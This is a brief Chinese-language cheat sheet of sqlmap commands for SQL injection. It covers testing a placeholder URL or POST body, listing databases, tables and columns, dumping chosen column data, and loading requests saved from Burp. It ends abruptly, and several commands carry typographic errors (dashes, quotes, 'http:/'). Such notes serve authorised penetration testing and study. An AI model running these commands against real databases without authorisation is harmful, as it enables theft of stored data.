基本功能:
sqlmap -u “http:/xxx.xxx” (—data=“id=&user=")
查看当前的数据库
sqlmap -u “http:/xxx.xxx” —dbs
查看数据库中的表
sqlmap -u “http:/xxx.xxx” -D 『dbname』—tables
查看表中的字段
sqlmap -u “http:/xxx.xxx” -D 『dbname』-T 『tablename』—columns
dump表中的数据
sqlmap -u “http:/xxx.xxx” -D 『dbname』-T 『tablename』-C 『columnname1,columnname2』—dump
从http请求的头中注入
Sqlmap -r xx.txt (里面的内容是burp中复制的内容,多用于post请求)
burp的requestlog
sqlmap -l xx.txt
post